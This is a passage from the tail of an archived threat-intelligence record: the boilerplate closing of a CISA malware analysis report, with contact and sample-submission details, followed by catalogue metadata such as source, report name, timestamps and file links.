To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.\r\nWhat is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.\r\nCan I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to CISA at 1-844-Say-CISA or CISA Central.\r\nCan I submit malware to CISA? Malware samples can be submitted via three methods:\r\nWeb: https://malware.us-cert.gov\r\nE-Mail: submit@malware.us-cert.gov\r\nFTP: ftp.malware.us-cert.gov (anonymous)\r\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.\r\nSource: https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a"
	],
	"report_names": [
		"ar20-259a"
	],
	"threat_actors": [],
	"ts_created_at": 1775439155,
	"ts_updated_at": 1775791306,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/72d04d5e11286840e3d04797b04757cc62fc9b7d.pdf",
		"text": "https://archive.orkl.eu/72d04d5e11286840e3d04797b04757cc62fc9b7d.txt",
		"img": "https://archive.orkl.eu/72d04d5e11286840e3d04797b04757cc62fc9b7d.jpg"
	}
}